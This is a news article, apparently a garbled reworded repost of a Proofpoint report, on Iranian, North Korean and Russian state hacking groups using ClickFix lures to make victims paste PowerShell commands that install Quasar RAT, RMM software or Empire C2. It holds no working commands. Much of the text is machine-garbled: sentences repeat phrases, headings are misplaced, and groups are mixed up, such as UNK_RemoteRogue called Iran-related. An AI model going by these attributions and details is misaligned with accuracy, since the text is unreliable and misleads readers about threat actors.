It has been found that hacking groups sponsored by multiple states in Iran, North Korea and Russia are leveraging the increasingly popular Clickfix social engineering tactics to deploy malware for three months from the second half of 2024 to the beginning of 2025 and the beginning of 2025.
The phishing campaigns employing the strategy are attributed to clusters tracked as TA427 (aka Kimsky), TA450 (aka Muddywater), UNK_Remoterogue, and TA422 (aka APT28).
Although Clickfix was an early access method that primarily partners with cybercrime groups, the effectiveness of the approach has also been adopted by nation-state groups.
“The incorporation of Clickfix replaces the installation and execution stages of existing infection chains rather than revolutionizing the campaigns carried out by TA427, TA450, UNK_REMOTEROGUE and TA422.”
Clickfix, in a nutshell, refers to a sly technique that encourages users to infect their machines following a set of instructions to copy, paste and execute malicious commands under the pretext of fixing issues, completing Captcha verification, or registering the device.
Proofpoint said it first detected Kimsuky using Clickfix in January 2025 and February 2025 as part of a phishing campaign targeting individuals from less than five organizations in the think tank sector.
“TA427 first contacted the target through a meeting request from a spoofed sender delivered to a traditional TA427 target working on the North Korean issue,” the Proofpoint Research team said.
TA427 Clickfix infection chain
“After a brief conversation to engage with the target and build trust, as is common in TA427 activities, the attacker pointed the target to an attacker-controlled site and convinced the target to run a PowerShell command.”
The company explained that the attack chain has launched a multi-stage sequence that culminated in the deployment of an open source remote access trojan named Quasar Rat.
The email message claimed it came from a Japanese diplomat and asked the recipients to arrange a meeting with the Japanese ambassador. During the conversation, threat actors sent malicious PDFs containing links to another document containing a list of questions to be discussed during the meeting.
TA450 Clickfix infection chain
When you click on the link, the victim will be directed to a fake landing page that mimics the Japanese Embassy website and to download the survey.[Windows Run]I’ve asked to copy and paste the command into the dialog to register the device.
“The Clickfix PowerShell command retrieves and executes a second remotely hosted PowerShell command, which showed the decoy PDF (Questionnaire.pdf) referenced earlier in the chain,” Proofpoint said. “The document claimed to be from the Japanese Ministry of Foreign Affairs and included questions regarding nuclear proliferation and policy in Northeast Asia.”
The second PowerShell script is configured to create a visual basic script that is run every 19 minutes by scheduled tasks. This will download two batch scripts that create, decode and execute the Quasar rat payload. It is worth pointing out that this variant of the attack chain was previously documented by Microsoft in February 2025.
UNK_REMOTEROGUE Clickfix Infection Chain
The second nation-state group latching to Clickfix is an Iran-related muddy group that utilizes methods to legitimate remote monitoring and management (RMM) software, such as the level to maintain sustainable access.
Phishing emails sent on November 13th and 14th, 2024, coincided with Tuesday’s patch update, spoofing a Tech Giant security update, asking message recipients to follow Clickfix-style instructions to address the vulnerability.
“The attacker deployed the Clickfix technique by persuading the target to run PowerShell first with administrator privileges and copying and running the commands contained in the email body,” ProofPoint said.
“This command was responsible for installing Remote Management and Monitoring (RMM) software. In this case, the level – then the TA450 operator will exploit the RMM tool to spy and remove data from the target machine.”
The TA450 Clickfix campaign is said to target the finance, government, health, education and transportation sectors with an emphasis on the United Arab Emirates (UAE) and Saudi Arabia, as well as the United Arab Emirates (UAE) and Saudi Arabia in Canada, Germany, Switzerland and the United States.
Also on board the Clickfix Bandwagon is a Russian group suspected of being a Russian group tracked as UNK_Remoterogue late last year using lure mail sent from a compromised Zimbra server containing a link to Microsoft Office documents.
Standard Campaign and Clickfix Sighting Timeline (July 2024 – March 2025)
When I visited the link I was presented with a page containing instructions to copy the code from my browser to the terminal, and also showed how the YouTube video tutorial could run PowerShell. The PowerShell commands were equipped with the ability to run JavaScript to run PowerShell code linked to the Empire Command-and-Control (C2) framework.
Proofpoint said the campaign sent 10 messages to individuals from two organizations associated with the leading weapons manufacturers in the defense industry. UNK_Remoterogue is also known to share another phishing campaign and infrastructure overlap with defense and aerospace entities that have links to ongoing conflicts in Ukraine to harvest webmail qualifications via fake login pages.
“Several examples of state-sponsored actors using Clickfix show that not only the popularity of techniques among state actors, but also the use of different countries within weeks of each other,” the company said. “While it’s not a permanent technique, it’s possible that more threat actors from North Korea, Iran and Russia have also tried and tested Clickfix or May in the near future.”
Source link
